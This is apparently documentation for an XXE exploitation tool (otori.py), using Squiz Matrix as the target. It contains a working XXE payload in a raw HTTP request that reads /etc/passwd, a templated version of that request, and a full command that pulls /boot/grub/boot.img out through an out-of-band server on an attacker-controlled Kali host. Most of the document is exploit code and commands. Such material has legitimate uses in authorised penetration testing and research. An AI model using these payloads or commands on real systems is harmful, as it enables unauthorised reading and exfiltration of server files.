The following request against an instance of Squiz Matrix is tested using Burp Suite and is found to imply that XXE-based content is being parsed on the target system, but not returned in the HTTP response:

POST /_admin/?SQ_ACTION=asset_map_request HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
User-Agent: Java(tm) 2 SDK, Standard Edition v1.7.0_03 Java/1.7.0_03
Host: squiztarget.vuln.local
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Content-Length: 165

<!DOCTYPE pussycatoaths [<!ENTITY pussycatoaths SYSTEM "file:///etc/passwd">]>
<command action="get translations" />
<pussycatoaths>&pussycatoaths;</pussycatoaths>

That request is converted to Unix-style newline characters, then "genericized" into the format On The Outside, Reaching In expects (see the detailed tutorial for more information):

POST /?SQ_ACTION=asset_map_request HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
User-Agent: Java(tm) 2 SDK, Standard Edition v1.7.0_03 Java/1.7.0_03
Host: squiztarget.vuln.local
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Content-Length: 31

<?xml version="1.0" ?>
%YUNUSOVOSIPOVBLOCK%
<command action="get translations" />

This modified version is saved as the file generic_xxe_request-squiz-template.txt

This template file is then used with this module using a command similar to:

python ./otori.py --clone --module "G-XXE-YO" --singleuri "file:///boot/grub/boot.img" --module-options "generic_xxe_request-squiz-template.txt" "http://squiztarget.vuln.local/?SQ_ACTION=asset_map_request" --outputbase "./output-generic-squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://kali.vuln.local:8080/CBt/" --swamm-url-read "http://kali.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://kali.vuln.local:8080/CBt/moc/" --swamm-url-append "http://kali.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://kali.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://kali.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://kali.vuln.local:8080/CBt/hpB/"

The example module options are:

1 - The name/path of the template request file (generic_xxe_request-squiz-template.txt).
2 - The URL of the vulnerable Squiz Matrix instance (this is not obtained from the request template in case the Host header is being spoofed).

